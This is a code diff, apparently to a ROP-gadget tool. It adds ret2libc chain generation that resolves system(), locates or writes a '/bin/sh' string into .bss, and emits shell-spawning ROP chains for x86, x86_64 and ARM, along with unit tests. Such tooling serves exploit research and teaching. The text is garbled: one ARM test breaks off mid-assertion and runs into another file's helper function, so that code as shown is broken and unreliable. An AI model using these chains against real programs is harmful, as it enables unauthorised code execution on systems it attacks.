+ Returns the entry's virtual address (preferring the ``endbr`` landing + pad of a ``.plt.sec`` entry when present).""" + prev = None + for insn in md.disasm(code, base): + if 'jmp' in insn.mnemonic and insn.operands: + op = insn.operands[0] + if op.type == CS_OP_MEM: + base_name = md.reg_name(op.mem.base) if op.mem.base else None + target = None + if base_name == 'rip': # x86_64 RIP-relative + target = insn.address + insn.size + op.mem.disp + elif base_name is None: # x86 absolute (non-PIE) + target = op.mem.disp & 0xffffffff + # base_name == 'ebx'/'rbx' (PIE) -> GOT base unknown, skip + if target is not None and target == got: + if (prev is not None and prev.mnemonic in ('endbr64', 'endbr32') + and prev.address + prev.size == insn.address): + return prev.address + return insn.address + prev = insn + return None + + def _armAddImmediate(self, ops, CS_OP_IMM): + """Value added by an ARM ``add`` immediate form. GAS/capstone render a + rotated modified-immediate as two operands ``#imm, #rot`` (value = + ``imm`` rotated right by ``rot``, as the PLT's ``add ip, pc, #0, #12``); + a plain ``add ip, ip, #8`` has a single immediate operand.""" + imms = [o.imm & 0xffffffff for o in ops[2:] if o.type == CS_OP_IMM] + if not imms: + return None + if len(imms) == 1: + return imms[0] + value, rot = imms[0], imms[1] & 31 + if rot == 0: + return value + return ((value >> rot) | (value << (32 - rot))) & 0xffffffff + + def _scanPltArm(self, md, code, base, got, CS_OP_MEM, CS_OP_IMM): + """Find an ARM PLT entry of the form + ``add ip, pc, #imm ; [add ip, ip, #imm ;] ldr pc, [ip, #imm]!`` whose + effective GOT dereference equals ``got``. 
Returns the address of the + leading ``add ip, pc`` (the stub entry point).""" + IP = ('ip', 'r12') + PC = ('pc', 'r15') + ip = None + entry_start = None + for insn in md.disasm(code, base): + m = insn.mnemonic + ops = insn.operands + if (m.startswith('add') and len(ops) >= 3 + and md.reg_name(ops[0].reg) in IP): + src = md.reg_name(ops[1].reg) + val = self._armAddImmediate(ops, CS_OP_IMM) + if val is None: + ip, entry_start = None, None + elif src in PC: # ARM PC reads as addr + 8 + ip = insn.address + 8 + val + entry_start = insn.address + elif src in IP and ip is not None: + ip += val + else: + ip, entry_start = None, None + elif m.startswith('ldr') and ip is not None and ops: + if (md.reg_name(ops[0].reg) in PC and len(ops) > 1 + and ops[1].type == CS_OP_MEM and md.reg_name(ops[1].mem.base) in IP): + if ((ip + ops[1].mem.disp) & 0xffffffff) == got and entry_start is not None: + return entry_start + ip, entry_start = None, None + return None + + def _findExistingString(self, text): + """Return the virtual address of an existing occurrence of ``text`` in + the primary binary, or ``None``.""" + binary = self._binaries[0] + try: + results = binary.searchString(text) + except BaseException: + return None + if results: + return results[0][0] + return None + + def _useBinaryForRebase(self, binary=None): + """Ensure ``binary`` (default: the primary binary) is registered in + ``_usedBinaries`` and return its ``rebase_N`` index. + + Gadget selection normally registers a binary as a side effect, but a + ret2libc chain may need to rebase an address (a resolved symbol, a + ``.data`` buffer) without having selected any gadget from that binary + yet. 
Rebasing only depends on the file (image base), not the section, + so an existing entry for the same file is reused when present.""" + binary = binary or self._binaries[0] + for idx, (fileName, _section) in enumerate(self._usedBinaries): + if fileName == binary.checksum: + return idx + # Register with the SAME (fileName, section) identity gadgets use, so a + # later _updateUsedBinaries(gadget) for this binary reuses this entry + # instead of emitting a second, identical IMAGE_BASE line. Gadget + # sections are identified by name (e.g. 'LOAD'), not Section objects. + gadgets = self._gadgets.get(binary) + if gadgets: + self._usedBinaries.append((gadgets[0].fileName, gadgets[0].section)) + else: + self._usedBinaries.append((binary.checksum, binary.executableSections[0])) + return len(self._usedBinaries) - 1 + + def _findWritableSection(self, min_size, prefer=('.bss', '.data')): + """Return ``(name, virtualAddress, offset, size)`` of a writable, + allocated section with at least ``min_size`` bytes of room (preferring + ``.bss`` then ``.data``, then any other), or ``None``. + + Writability and size are read straight from the ELF section headers + (``SHF_WRITE`` / ``sh_size``) so the choice is *verified natively* + rather than assumed. 
``.bss`` is SHT_NOBITS -- it occupies no file + bytes (``getSection('.bss').size`` would raise) -- but it is writable + and zero-filled at runtime, which is exactly what we want for a scratch + buffer, so the size is taken from ``sh_size`` here.""" + binary = self._binaries[0] + inner = getattr(binary, '_binary', None) + sections = getattr(inner, 'sections', None) + if not sections: + return None + try: + import filebytes.elf as _elf + W = _elf.SHF.WRITE + A = _elf.SHF.ALLOC + TLS = getattr(_elf.SHF, 'TLS', 0x400) + except BaseException: + W, A, TLS = 0x1, 0x2, 0x400 + found = {} + try: + for shdr in sections: + h = shdr.header + flags = h.sh_flags + if (flags & W) and (flags & A) and not (flags & TLS) and h.sh_size >= min_size: + name = shdr.name + found.setdefault(name, (name, h.sh_addr, h.sh_addr - binary.imageBase, h.sh_size)) + except BaseException: + return None + for name in prefer: + if name in found: + return found[name] + for info in found.values(): + return info + return None + + # ------------------------------------------------------------------ + # ret2libc (spawn_shell) building blocks shared by every architecture. + # + # Architectures differ only in address width and in how a string is + # written into a scratch section (the gadget primitives differ), so those + # two pieces are exposed as overridable hooks and everything else is + # generic. + # ------------------------------------------------------------------ + def _addressWidth(self): + """Address width in bytes for hex formatting (4 = 32-bit default).""" + return 4 + + def _writeCmdToMemory(self, cmd, where): + """Return a chain fragment that writes the NUL-terminated ``cmd`` into + the binary at ``where`` (an image-base-relative offset). 
Architecture + bases override this; the default signals that no write strategy is + available.""" + raise RopChainError('No memory-write strategy for this architecture') + + def _nulTerminateAndPad(self, cmd, width=None): + """NUL-terminate ``cmd`` and pad it up to a whole number of ``width`` + (default: the address width) byte words. The terminator is appended + *unconditionally* -- a command whose length is already a multiple of + ``width`` must still get a NUL so the written buffer is a valid C string + regardless of what follows it in memory (a zero-filled ``.bss`` would + mask a missing terminator, a ``.data`` fallback would not).""" + width = width or self._addressWidth() + what = cmd + '\x00' + if len(what) % width: + what += '\x00' * (width - len(what) % width) + return what + + def _rebaseLine(self, vaddr, comment): + """Emit a ``rop += rebase_N(offset) # comment`` line for an address + that lives *inside* the analysed binary (so it follows ASLR via the + existing ``rebase_N`` lambdas).""" + idx = self._useBinaryForRebase() + off = vaddr - self._binaries[0].imageBase + return 'rop += rebase_%d(%s) # %s\n' % (idx, toHex(off, self._addressWidth()), comment) + + def _resolveBinshPointer(self, cmd, string): + """Resolve a pointer to the command string for a ret2libc chain. + + Returns ``(chain_line, definitions, write_fragment)`` where + ``chain_line`` is the ``rop += ...`` line that yields the pointer, + ``definitions`` is any ``NAME = 0x..`` preamble it references, and + ``write_fragment`` is chain text that must run earlier to populate the + buffer (empty unless the string is written into a scratch section). 
+ + Precedence: explicit ``string=`` address > an existing copy already + present in the binary (no write needed) > write ``cmd`` into a writable + scratch section (``.bss`` preferred) via write-what-where gadgets > + placeholder.""" + width = self._addressWidth() + if string is not None: + value = int(string, 16) if isinstance(string, str) else string + defs = 'BINSH_ADDR = %s # address of "%s" (supplied)\n' % (toHex(value, width), cmd) + return ('rop += p(BINSH_ADDR)\n', defs, '') + + # Reuse an existing copy of the string if the binary already contains + # one -- no write gadgets required. + found = self._findExistingString(cmd) + if found is not None: + self._printMessage('Found existing "%s" in the binary at %s' % (cmd, toHex(found, width))) + return (self._rebaseLine(found, '"%s" (found in binary)' % cmd), '', '') + + # Otherwise plant the string in a writable scratch section (.bss first). + # Round up to the address width to match how the write pads the buffer, + # and require the section to natively have that much room and be + # writable. + needed = len(cmd) + 1 + needed += (-needed) % width + section = self._findWritableSection(needed) + if section is not None: + name, vaddr, offset, size = section + try: + write_text = self._writeCmdToMemory(cmd, offset) + self._printMessage('Writing "%s" into %s at %s (%d of %d bytes)' + % (cmd, name, toHex(vaddr, width), needed, size)) + # Address the buffer with the SAME rebase convention the write + # uses (rebase_N(offset)), so the pointer and the written bytes + # always coincide -- including under a manually overridden image + # base. Do NOT route through _rebaseLine(), which expects an + # absolute virtual address and would subtract the image base a + # second time from this already-relative offset. 
+ idx = self._useBinaryForRebase() + line = 'rop += rebase_%d(%s) # "%s" (written to %s)\n' % (idx, toHex(offset, width), cmd, name) + return (line, '', write_text) + except RopChainError as e: + self._printMessage('Cannot write "%s" into %s: %s' % (cmd, name, e)) + else: + self._printMessage('No writable section has room for "%s" (%d bytes).' % (cmd, needed)) + + self._printMessage('Could not resolve a pointer to "%s"; using placeholder BINSH_ADDR.' % cmd) + defs = 'BINSH_ADDR = 0x41414141 # TODO: set address of "%s"\n' % cmd + return ('rop += p(BINSH_ADDR)\n', defs, '') + + def _resolveSystemAddress(self, address): + """Resolve the address of libc ``system()`` for a ret2libc chain. + + Returns ``(chain_line, definitions)``. Precedence: explicit + ``address=`` (absolute, not rebased) > a ``system`` symbol defined in + this binary (rebased) > a verified ``system@plt`` stub (rebased) > an + import hint plus placeholder > placeholder.""" + width = self._addressWidth() + if address is not None: + value = int(address, 16) if isinstance(address, str) else address + defs = 'SYSTEM_ADDR = %s # libc system() (supplied)\n' % toHex(value, width) + return ('rop += p(SYSTEM_ADDR)\n', defs) + + sym = self._findSymbolAddress('system') + if sym is not None: + self._printMessage('Resolved system() from symbol table at %s' % toHex(sym, width)) + return (self._rebaseLine(sym, 'system()'), '') + + plt = self._findPltStub('system') + if plt is not None: + self._printMessage('Resolved system@plt at %s (verified against its GOT slot).' + % toHex(plt, width)) + return (self._rebaseLine(plt, 'system@plt'), '') + + got = self._findImportGotSlot('system') + if got is not None: + self._printMessage('system() is imported via PLT (GOT slot at %s) but its stub ' + 'could not be auto-resolved.' 
% toHex(got, width)) + self._printMessage('Pass address=.') + defs = ('SYSTEM_ADDR = 0xdeadbeef # TODO: libc system() ' + '(imported via PLT; GOT slot at %s)\n' % toHex(got, width)) + return ('rop += p(SYSTEM_ADDR)\n', defs) + + self._printMessage('Could not resolve system(); using placeholder SYSTEM_ADDR.') + defs = 'SYSTEM_ADDR = 0xdeadbeef # TODO: set libc system() address\n' + return ('rop += p(SYSTEM_ADDR)\n', defs) diff --git a/testcases/test_chain_arm.py b/testcases/test_chain_arm.py new file mode 100644 index 0000000..fc3e2ae --- /dev/null +++ b/testcases/test_chain_arm.py @@ -0,0 +1,56 @@ +# coding=utf-8 +# Tests for the ARM execve ropchain generator. +import unittest + +from ropper.service import RopperService +from ropper.common.error import RopperError + + +_ARM_BINARY = 'test-binaries/ls-arm' + + +def _generate(arch='ARM', options=None): + rs = RopperService(options={'all': False, 'type': 'all', 'inst_count': 6}) + rs.addFile(_ARM_BINARY, arch=arch) + rs.loadGadgetsFor(_ARM_BINARY) + return rs.createRopChain('execve', arch, options=options or {}) + + +class ARMExecveChain(unittest.TestCase): + + def test_arch_is_supported(self): + # Before this change, calling --chain execve on ARM raised + # "ArchitectureArm does not have support for execve chain generation". + # Confirm createRopChain no longer raises that for ARM. 
+ try: + chain = _generate('ARM', {'cmd': '/bin/sh'}) + except RopperError as e: + self.fail('ARM execve chain raised RopperError: %s' % e) + self.assertIn('rop = ', chain) + + def test_chain_emits_header_and_rebase(self): + chain = _generate('ARM', {'cmd': '/bin/sh'}) + self.assertIn("p = lambda x : pack('> r) | (v << (32 - r))) & 0xffffffff + + ip = None + for insn in md.disasm(code, stub): + ops = insn.operands + if is_arm: + if insn.mnemonic.startswith('add') and len(ops) >= 3 and md.reg_name(ops[0].reg) in ('ip', 'r12'): + imms = [o.imm & 0xffffffff for o in ops[2:] if o.type == CS_OP_IMM] + if not imms: + continue + val = imms[0] if len(imms) == 1 else ror32(imms[0], imms[1]) + if md.reg_name(ops[1].reg) in ('pc', 'r15'): + ip = insn.address + 8 + val + elif ip is not None and md.reg_name(ops[1].reg) in ('ip', 'r12'): + ip += val + elif insn.mnemonic.startswith('ldr') and ip is not None and md.reg_name(ops[0].reg) in ('pc', 'r15'): + return (ip + ops[1].mem.disp) & 0xffffffff + else: + if 'jmp' in insn.mnemonic and ops and ops[0].type == CS_OP_MEM: + bn = md.reg_name(ops[0].mem.base) if ops[0].mem.base else None + if bn == 'rip': + return insn.address + insn.size + ops[0].mem.disp + if bn is None: + return ops[0].mem.disp & 0xffffffff + return None + + +class SpawnShellCommon(unittest.TestCase): + """Architecture-agnostic guarantees, run for every supported arch.""" + + def test_arch_is_supported(self): + for arch in _BINARIES: + try: + chain = _generate(arch, {'cmd': '/bin/sh'}) + except RopperError as e: + self.fail('spawn_shell raised RopperError for %s: %s' % (arch, e)) + self.assertIn('rop = ', chain, arch) + + def test_emits_runnable_skeleton(self): + for arch in _BINARIES: + chain = _generate(arch) + self.assertIn('from struct import pack', chain, arch) + self.assertIn("rop = ''", chain, arch) + self.assertIn('print(rop)', chain, arch) + + def test_supplied_addresses_are_used_verbatim_not_rebased(self): + # address= (libc system) and string= 
(&"/bin/sh") are absolute runtime + # addresses, so they must be emitted through plain p(), never rebased. + for arch in _BINARIES: + chain = _generate(arch, {'address': '0xf7c4d3e0', 'string': '0xcafe0000'}) + # Value width is arch-dependent (zero-padded to 4 or 8 bytes), so + # assert on the significant hex digits rather than exact formatting. + self.assertIn('SYSTEM_ADDR =', chain, arch) + self.assertIn('f7c4d3e0', chain, arch) + self.assertIn('BINSH_ADDR =', chain, arch) + self.assertIn('cafe0000', chain, arch) + self.assertIn('rop += p(SYSTEM_ADDR)', chain, arch) + self.assertIn('rop += p(BINSH_ADDR)', chain, arch) + # A supplied string must never trigger a .data write. + self.assertNotIn('written to .data', chain, arch) + self.assertNotIn("rop += '", chain, arch) + + def test_missing_system_falls_back_to_placeholder(self): + # None of the ls-* test binaries define or import system(), so the + # generator must degrade to a clearly-labelled placeholder. + for arch in _BINARIES: + chain = _generate(arch) + self.assertIn('SYSTEM_ADDR = 0xdeadbeef', chain, arch) + self.assertIn('TODO', chain, arch) + + +class SpawnShellX86(unittest.TestCase): + + def test_cdecl_layout_order(self): + # cdecl: [&system][return addr][&cmd] - system must precede the arg. + chain = _generate('x86', {'address': '0x11112222', 'string': '0x33334444'}) + sys_pos = chain.index('rop += p(SYSTEM_ADDR)') + arg_pos = chain.index('rop += p(BINSH_ADDR)') + self.assertLess(sys_pos, arg_pos) + self.assertIn('return address', chain) + + +class SpawnShellX86_64(unittest.TestCase): + + def test_uses_pop_rdi_and_alignment_ret(self): + chain = _generate('x86_64', {'address': '0x11112222', 'string': '0x33334444'}) + # ls-x86_64 ships a `pop rdi ; ret`. + self.assertIn('pop rdi', chain) + # rdi (arg) is loaded before the call to system. + self.assertLess(chain.index('pop rdi'), chain.index('rop += p(SYSTEM_ADDR)')) + # Stack alignment ret is added by default for glibc movaps. 
+ self.assertIn('stack alignment', chain) + + def test_align_false_skips_alignment_ret(self): + chain = _generate('x86_64', {'address': '0x11112222', 'align': 'false'}) + self.assertNotIn('16-byte stack alignment for glibc', chain) + + +class SpawnShellARM(unittest.TestCase): + + def test_emits_placeholder_when_no_r0_pop(self): + # ls-arm has no `pop {r0, .., pc}` gadget, so a placeholder with the + # intended r0/pc slots must be emitted rather than raising. + chain = _generate('ARM', {'address': '0x11112222', 'string': '0x33334444'}) + self.assertIn('INSERT `pop {r0, pc}` GADGET HERE', chain) + self.assertIn('intended for r0', chain) + self.assertIn('intended for pc', chain) + + +class SpawnShellResolvers(unittest.TestCase): + """Direct coverage of the shared symbol/import resolution helpers.""" + + def test_imported_symbol_reports_got_slot_but_no_definition(self): + for arch in _BINARIES: + gen = _generator(arch) + # strlen is imported by every ls-* binary. + self.assertIsNotNone(gen._findImportGotSlot('strlen'), arch) + # ...but it is not *defined* inside the binary. 
+ self.assertIsNone(gen._findSymbolAddress('strlen'), arch) + + def test_unknown_symbol_resolves_to_none(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findImportGotSlot('totally_not_a_symbol_zzz'), arch) + self.assertIsNone(gen._findSymbolAddress('totally_not_a_symbol_zzz'), arch) + + def test_missing_string_resolves_to_none(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findExistingString('this string is not present zzz'), arch) + + +class SpawnShellPltResolution(unittest.TestCase): + """Verified system@plt resolution (exercised via imported libc symbols, + since the bundled ls-* binaries import strlen/malloc/exit, not system).""" + + def test_resolved_stub_dereferences_the_symbols_got_slot(self): + for arch in _BINARIES: + gen = _generator(arch) + loader = gen._binaries[0] + for sym in ('strlen', 'malloc', 'exit'): + got = gen._findImportGotSlot(sym) + stub = gen._findPltStub(sym) + self.assertIsNotNone(got, '%s/%s' % (arch, sym)) + self.assertIsNotNone(stub, '%s/%s stub' % (arch, sym)) + # Ground truth: the resolved stub must dereference exactly the + # relocation's GOT slot (re-derived by an independent path). + self.assertEqual(_plt_deref(loader, stub), got, '%s/%s deref' % (arch, sym)) + + def test_distinct_symbols_resolve_to_distinct_stubs(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertNotEqual(gen._findPltStub('strlen'), gen._findPltStub('malloc'), arch) + + def test_non_imported_symbol_resolves_to_none(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findPltStub('definitely_not_imported_zzz'), arch) + + def test_system_resolves_via_plt_stub_when_imported(self): + # No bundled binary imports system(), so map system's GOT lookup onto an + # actually-imported symbol's slot and confirm _resolveSystemAddress + # emits a rebased system@plt (not a SYSTEM_ADDR placeholder). 
+ for arch in _BINARIES: + gen = _generator(arch) + slot = gen._findImportGotSlot('strlen') + gen._findImportGotSlot = lambda nm, _s=slot: _s if nm == 'system' else None + line, defs = gen._resolveSystemAddress(None) + self.assertIn('system@plt', line, arch) + self.assertIn('rebase_', line, arch) + self.assertEqual('', defs, arch) + self.assertNotIn('SYSTEM_ADDR', line, arch) + + +class SpawnShellRegression(unittest.TestCase): + """Regression coverage for defects found during review.""" + + def test_scratch_buffer_pointer_resolves_to_the_written_address(self): + # Defect: the write branch routed an already-image-base-relative offset + # through _rebaseLine(), which subtracted the image base a second time, + # so the pointer landed `imageBase` bytes away from where the string was + # written. The pointer must rebase exactly to the scratch buffer + # (== the chosen writable section's virtualAddress). Force the write + # branch with stubs so the test does not depend on the binary having a + # write-what-where gadget or lacking the string. 
+ for arch in _BINARIES: + gen = _generator(arch) + gen._findExistingString = lambda s: None + gen._writeCmdToMemory = lambda cmd, where: "rop += 'STUB-WRITE'\n" + line, defs, write_text = gen._resolveBinshPointer('/bin/sh', None) + self.assertIn('written to', line, arch) + self.assertEqual('', defs, arch) + self.assertIn('STUB-WRITE', write_text, arch) + m = re.search(r'rebase_\d+\((0x[0-9a-fA-F]+)\)', line) + self.assertIsNotNone(m, '%s: %r' % (arch, line)) + emitted_off = int(m.group(1), 16) + section = gen._findWritableSection(8) + self.assertIsNotNone(section, arch) + _name, vaddr, _off, _size = section + self.assertEqual(emitted_off + gen._binaries[0].imageBase, vaddr, arch) + + def test_x86_64_padding_counts_extended_registers(self): + # Defect: _paddingNeededFor's `^pop (...)$` matched exactly three chars, + # silently dropping `pop r8` / `pop r9`, which under-padded the chain and + # let the extra pop swallow the next chain word. + gen = _generator('x86_64') + + class _FakeGadget(object): + lines = [(0, 'pop rdi'), (4, 'pop r8'), (8, 'pop r9'), (12, 'pop r15'), (16, 'ret')] + + self.assertEqual(gen._paddingNeededFor(_FakeGadget()), ['r8', 'r9', 'r15']) + + +class SpawnShellScratchWrite(unittest.TestCase): + """Default system('/bin/sh') with the .bss write fallback.""" + + def test_findwritable_returns_bss_with_native_size_and_address(self): + # .bss is SHT_NOBITS (getSection('.bss').size would crash), so the + # finder must read sh_addr/sh_size/sh_flags straight from the header. 
+ for arch in _BINARIES: + gen = _generator(arch) + b = gen._binaries[0] + bss = next(s.header for s in b._binary.sections if s.name == '.bss') + sec = gen._findWritableSection(8) + self.assertIsNotNone(sec, arch) + name, vaddr, offset, size = sec + self.assertEqual(name, '.bss', arch) + self.assertEqual(vaddr, bss.sh_addr, arch) + self.assertEqual(offset, vaddr - b.imageBase, arch) + self.assertEqual(size, bss.sh_size, arch) + + def test_findwritable_rejects_oversized_request(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findWritableSection(64 * 1024 * 1024), arch) + + def test_existing_string_is_preferred_over_writing(self): + # If the binary already contains the string, use it -- never write. + for arch in _BINARIES: + gen = _generator(arch) + gen._findExistingString = lambda s, _b=gen._binaries[0]: 0x1234 + _b.imageBase + wrote = [] + gen._writeCmdToMemory = lambda cmd, where: wrote.append(where) or 'X' + line, defs, write_text = gen._resolveBinshPointer('/bin/sh', None) + self.assertIn('found in binary', line, arch) + self.assertEqual('', write_text, arch) + self.assertEqual(wrote, [], arch) # write hook never invoked + + def test_written_string_is_always_nul_terminated_and_word_aligned(self): + # Regression: the ARM writer used to skip the NUL when len(cmd) was a + # multiple of 4, so a path like "/bin/cat" (8 chars) was written without + # a terminator -- only masked by a zero-filled .bss. All three writers + # share _nulTerminateAndPad, which must always terminate and word-align. 
+ for arch in _BINARIES: + gen = _generator(arch) + width = gen._addressWidth() + for cmd in ('/bin/sh', '/bin/cat', '/usr/bin/sh', 'aaaaaaaa', 'a'): + padded = gen._nulTerminateAndPad(cmd) + msg = '%s/%r' % (arch, cmd) + self.assertTrue(padded.startswith(cmd), msg) + self.assertEqual(len(padded) % width, 0, msg) + self.assertEqual(padded[len(cmd)], '\x00', msg) # NUL right after cmd + self.assertGreaterEqual(len(padded), len(cmd) + 1, msg) + + def test_custom_path_is_written_when_absent(self): + # A user-supplied path (cmd=) flows verbatim into the scratch write. + for arch in _BINARIES: + gen = _generator(arch) + gen._findExistingString = lambda s: None + seen = {} + gen._writeCmdToMemory = lambda cmd, where: seen.update(cmd=cmd, where=where) or 'W' + line, defs, write_text = gen._resolveBinshPointer('/custom/path', None) + self.assertEqual(seen.get('cmd'), '/custom/path', arch) + self.assertIn('/custom/path', line, arch) + self.assertIn('written to', line, arch) + + +if __name__ == '__main__': + unittest.main()